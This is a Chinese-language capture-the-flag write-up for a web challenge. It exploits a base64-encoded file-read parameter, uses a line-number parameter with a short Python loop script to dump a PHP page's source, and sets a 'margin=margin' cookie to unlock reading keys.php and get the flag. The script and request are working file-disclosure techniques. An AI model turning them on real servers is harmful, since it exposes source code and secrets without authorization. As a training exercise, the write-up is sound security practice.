感觉这题还是比较接近实战,虽然比较简单。但是还是实战的一部分。
有些时候登录到某个界面的时候就需要验证cookie且需要判断你是否进入了这个界面,那么也就是说当filename等于admin.php且cookie又等于某个值的时候,这题当中是cookie:margin=margin
http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ=
一看就知道是文件读取的,然后解密了一下a2V5cy50eHQ=是keys.txt。最后然后改为index.php发现只出现<?php
后来经过测试line参数控制输出的行数
写了一个小脚本跑源码:
#!/usr/bin/env python #encoding:utf-8 #by i3ekr import requests for i in xrange(0,150): url = "http://120.24.86.145:8002/web11/index.php?line=%s&filename=aW5kZXgucGhw"%(i) html = requests.get(url).text print html
get源码如下,本来有很多空格我给删了。
<?php error_reporting(0); $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ="); $file_list = array( '0' =>'keys.txt', '1' =>'index.php', ); if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){#设置了cookie,且cookie等于margin $file_list[2]='keys.php'; } if(in_array($file, $file_list)){#判断$file的内容是否在$file_list当中,也就是filename参数要等于keys.php $fa = file($file);#与 file_get_contents() 类似,不同的是 file() 将文件作为一个数组返回。 echo $fa[$line];#输出$fa[$line],$line是你输入的行数。也就是说按照行数然后将keys.php的代码以数组的形式呈现。 } var_dump($file_list[2]); ?>
最终get答案为
index.php?line=1&filename=a2V5cy5waHA=
且需要将cookie设置为margin=margin
可以再用刚开始那个脚本再将line遍历一边keys.php即可getflag